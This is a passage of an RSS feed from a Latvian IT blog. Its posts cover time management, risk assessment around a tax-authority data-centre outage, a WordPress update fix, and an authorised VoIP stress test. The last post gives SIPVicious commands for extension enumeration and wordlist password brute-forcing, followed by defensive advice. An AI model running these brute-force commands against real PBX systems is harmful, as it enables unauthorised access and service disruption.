<li><a href='http://dll.lv/gramata-efektivs-vaditajs' rel='bookmark' title='Grāmata: Efektīvs vadītājs'>Grāmata: Efektīvs vadītājs</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Interesants video ir ievietots <a href="http://web.hc.lv/motivacija-idejas/raksti/laika-menedzments/">http://web.hc.lv/motivacija-idejas/raksti/laika-menedzments/</a></p>
<p>kuru var klausīties darot ko paralēli, piemēram, esot ceļā vai tīrot māju.</p>
<p>Galvenās  atziņas:</p>
<ul>
<li>Pie viena darba jāstrādā nepārtraukti- vismaz 2h. Vairāku darbu darīšana nav efektīva.</li>
<li>Jāievēro sava ķermeņa bioritms- katram ir savs produktīvākais laiks.</li>
<li>Jāizveido svarīgo un nepieciešamo darbu rutīna- tie jāveic regulāri.</li>
<li>Vienmēr ir jāieplāno laiks atpūtai, kuras laikā pilnībā var atslēgties no darba jautājumiem.</li>
</ul>
<div>Zelta vārdi:</div>
<div>Laiku pārvaldīt nav iespējams, bet varam padarīt sevi efektīvāku.</div>
<p>Related posts:<ol>
<li><a href='http://dll.lv/parmainu-vadiba' rel='bookmark' title='Pārmaiņu vadība'>Pārmaiņu vadība</a></li>
<li><a href='http://dll.lv/personiga-efektivitate' rel='bookmark' title='Personīgā efektivitāte'>Personīgā efektivitāte</a></li>
<li><a href='http://dll.lv/gramata-efektivs-vaditajs' rel='bookmark' title='Grāmata: Efektīvs vadītājs'>Grāmata: Efektīvs vadītājs</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/laika-un-sevis-vadiba/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>VID datucentru problēma un DEAC neveiksmīga PR kampaņa</title>
		<link>http://dll.lv/vid-datucentru-problema-un-deac-neveiksmiga-pr-kampana?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=vid-datucentru-problema-un-deac-neveiksmiga-pr-kampana</link>
		<comments>http://dll.lv/vid-datucentru-problema-un-deac-neveiksmiga-pr-kampana#comments</comments>
		<pubDate>Fri, 05 Aug 2011 07:08:17 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Dzīve]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Vadība]]></category>
		<category><![CDATA[DEAC]]></category>
		<category><![CDATA[drošs risinājums]]></category>
		<category><![CDATA[EDS]]></category>
		<category><![CDATA[risk]]></category>
		<category><![CDATA[riski]]></category>
		<category><![CDATA[risks]]></category>
		<category><![CDATA[VID]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1692</guid>
		<description><![CDATA[Pārlasīju mēdijos publicētos DEAC rakstus par VID datu centra dīkstāvi elektrības pārtraukuma rezultātā. Personīgi nepazīstu nevienu VID IT pārstāvi, bet manuprāt jocīgi (neticami) izklausījās Gailīša paziņojums -&#8221;VID nerēķinās ar riskiem&#8221;, jo: 1. Valsts informācijas sistēmu likums nosaka, ka riski ir &#8230; <a href="http://dll.lv/vid-datucentru-problema-un-deac-neveiksmiga-pr-kampana">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/risks-iespeja-zaudet-vai-iespeja-iegut' rel='bookmark' title='Risks- iespēja zaudēt vai iespēja iegūt?'>Risks- iespēja zaudēt vai iespēja iegūt?</a></li>
<li><a href='http://dll.lv/ka-tika-noladeti-dati-no-vid-eds-sistemas' rel='bookmark' title='Kā tika nolādēti dati no VID EDS sistēmas?'>Kā tika nolādēti dati no VID EDS sistēmas?</a></li>
<li><a href='http://dll.lv/riska-vadibas-strategijas-uznemuma-1-dala' rel='bookmark' title='Riska vadības stratēģijas uzņēmumā (1. daļa)'>Riska vadības stratēģijas uzņēmumā (1. daļa)</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Pārlasīju mēdijos publicētos DEAC <a href="http://www.db.lv/tehnologijas/deac-vid-neatbilstosi-uztur-datus-nerekinoties-ar-riskiem-242575">rakstus</a> par VID datu centra dīkstāvi elektrības pārtraukuma rezultātā.</p>
<p>Personīgi nepazīstu nevienu VID IT pārstāvi, bet manuprāt jocīgi (neticami) izklausījās Gailīša paziņojums -&#8221;VID nerēķinās ar riskiem&#8221;, jo:</p>
<p>1. Valsts informācijas sistēmu likums nosaka, ka riski ir jāizvērtē (negribas ticēt, ka šo punktu kāds ignorē);</p>
<p>2. Jebkura biznesa uzdevums nav izslēgt pilnīgi visus riskus, bet sabalansēt to iestāšanās ietekmes zaudējumus pret nepieciešamām investīcijām to novēršanā.</p>
<p>Risku novērtēšanas piemērs, kurš uzreiz nāk prātā:</p>
<p>Risks- elektrības pārtraukuma gadījumā ģeneratora jauda neapmierina DC nepieciešamo.</p>
<p>Riska iestāšanās varbūtība &#8211; 1 x gadā.</p>
<p>Riska ietekme &#8211; informācijas sistēma nav pieejama līdz elektrības padeve atjaunojas (vidēji 4h).</p>
<p>Riska novēršanas scenārijs- iegādāties jaudīgāku ģeneratoru &#8211; 200 000 Ls</p>
<p>Piedāvātais risku mazinošais pasākums bez ģeneratoru iegādes- atslēgt mazāk svarīgus serverus iegūstot jaudu kritiskākiem resursiem vai arī laicīgi veikt drošu sistēmas izslēgšanu neapdraudot datu integritāti.</p>
<p>Augstākminētais piemērs ir mans pieņēmums (uzskatu vismaz 90% korekts), bet tas labi ilustrē, ka ne vienmēr ir izdevīgi novērst visus riskus. Jāņem vērā to, kas vienam ir nepieņemams risks, tas otram ir pieņemams, piemēram, bankas neriskēs 200 000 Ls dēļ ar risku- Internetbanka nav pieejama (jo zaudējumi būtu daudz lielāki), bet vai VID šāds risks ir tik būtisks &#8211; nedomāju.</p>
<p>Jāatceras arī tas, ka VID IT budžets veidojas no mūsu nodokļiem, tāpēc katram ir sev jāatbild &#8211;  vai es maksātu X latus par VID IT 4h dīkstāves riska mazināšanu viena gada laikā.</p>
<p>PS. Pēc šī DEAC raksta izskatās, ka zaudētāji ir tikai pats DEAC, jo palasot komentārus visi saprot, ka tas ir tikai PR, kā arī atgādina cilvēkiem par paša DEAC problēmām (vairākas dīkstāves un interneta pieslēguma pārtraukumus).</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/risks-iespeja-zaudet-vai-iespeja-iegut' rel='bookmark' title='Risks- iespēja zaudēt vai iespēja iegūt?'>Risks- iespēja zaudēt vai iespēja iegūt?</a></li>
<li><a href='http://dll.lv/ka-tika-noladeti-dati-no-vid-eds-sistemas' rel='bookmark' title='Kā tika nolādēti dati no VID EDS sistēmas?'>Kā tika nolādēti dati no VID EDS sistēmas?</a></li>
<li><a href='http://dll.lv/riska-vadibas-strategijas-uznemuma-1-dala' rel='bookmark' title='Riska vadības stratēģijas uzņēmumā (1. daļa)'>Riska vadības stratēģijas uzņēmumā (1. daļa)</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/vid-datucentru-problema-un-deac-neveiksmiga-pr-kampana/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>WordPress update crash</title>
		<link>http://dll.lv/wordpress-update-crash?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=wordpress-update-crash</link>
		<comments>http://dll.lv/wordpress-update-crash#comments</comments>
		<pubDate>Sun, 26 Jun 2011 19:16:41 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[auto update]]></category>
		<category><![CDATA[paplašinam wordpress]]></category>
		<category><![CDATA[update]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[wordpress update]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1631</guid>
		<description><![CDATA[Problēma: Atjaunojot wordpress izmantojot automātisko atjaunināšanas iespēju tas regulāri beidzass ar kļūdu. Šo problēmu atrisina plugins ftp-upgrade-fix.1.0 Related posts: Atjaunojam wordpress Draugiem.lv pase priekš wordpress Paplašinām wordpress iespējas
Related posts:<ol>
<li><a href='http://dll.lv/atjaunojam-wordpress' rel='bookmark' title='Atjaunojam wordpress'>Atjaunojam wordpress</a></li>
<li><a href='http://dll.lv/draugiem-lv-pase-prieks-wordpress' rel='bookmark' title='Draugiem.lv pase priekš wordpress'>Draugiem.lv pase priekš wordpress</a></li>
<li><a href='http://dll.lv/paplasinam-wordpress-iespejas' rel='bookmark' title='Paplašinām wordpress iespējas'>Paplašinām wordpress iespējas</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Problēma:<br />
Atjaunojot wordpress izmantojot automātisko atjaunināšanas iespēju tas regulāri beidzass ar kļūdu.<br />
Šo problēmu atrisina plugins <a href="http://wordpress.org/extend/plugins/ftp-upgrade-fix/">ftp-upgrade-fix.1.0</a></p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/atjaunojam-wordpress' rel='bookmark' title='Atjaunojam wordpress'>Atjaunojam wordpress</a></li>
<li><a href='http://dll.lv/draugiem-lv-pase-prieks-wordpress' rel='bookmark' title='Draugiem.lv pase priekš wordpress'>Draugiem.lv pase priekš wordpress</a></li>
<li><a href='http://dll.lv/paplasinam-wordpress-iespejas' rel='bookmark' title='Paplašinām wordpress iespējas'>Paplašinām wordpress iespējas</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/wordpress-update-crash/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>VoIP stress tests</title>
		<link>http://dll.lv/voip-stress-tests?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=voip-stress-tests</link>
		<comments>http://dll.lv/voip-stress-tests#comments</comments>
		<pubDate>Tue, 21 Jun 2011 19:41:45 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[back track]]></category>
		<category><![CDATA[back track 5]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[penetration test]]></category>
		<category><![CDATA[tests]]></category>
		<category><![CDATA[VoIP]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1625</guid>
		<description><![CDATA[Man palūdza veikt vienas VoIP platformas autentifikācijas stress testu, jo vajadzēja notestēt jauno DOS aizsardzības mehānismu. Pēc daudzu materiālu izlasīšanas un rīku testēšanas konstatēju, ka man vislabāk patīk: svmap.py &#8211; VoIP PBX meklēšanai (man nebija nepieciešams, jo pamat info jau &#8230; <a href="http://dll.lv/voip-stress-tests">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/administratoru-tests' rel='bookmark' title='Administratoru tests'>Administratoru tests</a></li>
<li><a href='http://dll.lv/drupal-stress-test' rel='bookmark' title='Drupal stress test'>Drupal stress test</a></li>
<li><a href='http://dll.lv/banku-internetbanku-autentifikacijas-un-autorizacijas-drosibas-salidzinajums' rel='bookmark' title='Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums'>Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Man palūdza veikt vienas VoIP platformas autentifikācijas stress testu, jo vajadzēja notestēt jauno DOS aizsardzības mehānismu.<br />
Pēc daudzu materiālu izlasīšanas un rīku testēšanas konstatēju, ka man vislabāk patīk:<br />
svmap.py &#8211; VoIP PBX meklēšanai (man nebija nepieciešams, jo pamat info jau bija zināma. Bet ir noderīgas rīks, ja grib uzzināt kāds tieši PBX slēpjas (taisa fingerprint));<br />
svwar.py &#8211; numuru meklēšanai (sūta gan invite, gan register pieprasījumus);<br />
(no šī rīka labums bija mazs, ja VoIP bija ieslēgts alwaysauthreject, kā rezultātā uz visiem pieprasījumiem tika saņemta vienāda atbilde)<br />
svcrack.py &#8211; paroles brote-force minēšanai.</p>
<p>Sintakse:<br />
./svwar.py -e100-400 192.168.1.104<br />
./svcrack.py -u200 -d wordlist.txt 192.168.1.104</p>
<p>Viss pārējais ir izdomas un skriptu jautājums.</p>
<p>Nelieli raksti par VoIP no <a href="http://www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP#Svwar">Back-track</a>, <a href="http://sysadminman.net/blog/2009/hacking-and-securing-your-asterisk-server-592">sysadmin.net</a>, <a href="http://code.google.com/p/sipvicious/wiki/Svwarusage" target="_blank">te</a>, <a href="http://www.rizvisarwar.info/study-resources-1/kth-study/principle-of-computer-security" target="_blank">asterix hacking and security</a>, <a href="http://nagg.ru/2011/03/vzlom-i-zashhita-vashego-servera-asterisk/" target="_blank">asterix krieviski</a> .<br />
<a href="http://www.voipsa.org/Resources/tools.php">Programmu uzskaitījums</a><br />
<a href="http://en.wikipedia.org/wiki/Session_Initiation_Protocol">Nedaudz par pašu SIP protokolu</a></p>
<p>!!!Atcerieties &#8211; Bez resursa turētāja atļaujas ir aizliekts veikt jebkādus testus!!!<br />
Anonimitāte internetā ir mīts. Viss pārējais ir laika jautājums.</p>
<p>Kā aizsargāties?<br />
Vienmēr izmantot sarežģītas paroles- vienkāršas paroles ar svcrack tiek uzlauztas dažu sekunžu laikā;<br />
Ieslēgt alwaysauthreject, lai nevar atklāt VOIP numurus un līdz ar to piemeklēt paroli;<br />
Ja iespējams limitēt pieeju PBX;<br />
Izmantot vairāku līmeņu arhitektūru;<br />
Aizliegt pārējo portu izmantošanu;<br />
Ieviest pret DOS un DDOS aizsardzību, jo kā izrādījās ar autentifikācijas pieprasījumiem var vienkārši uzkarināt PBX;<br />
Un prasīt google secure VoIP un hack VoIP.</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/administratoru-tests' rel='bookmark' title='Administratoru tests'>Administratoru tests</a></li>
<li><a href='http://dll.lv/drupal-stress-test' rel='bookmark' title='Drupal stress test'>Drupal stress test</a></li>
<li><a href='http://dll.lv/banku-internetbanku-autentifikacijas-un-autorizacijas-drosibas-salidzinajums' rel='bookmark' title='Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums'>Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/voip-stress-tests/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

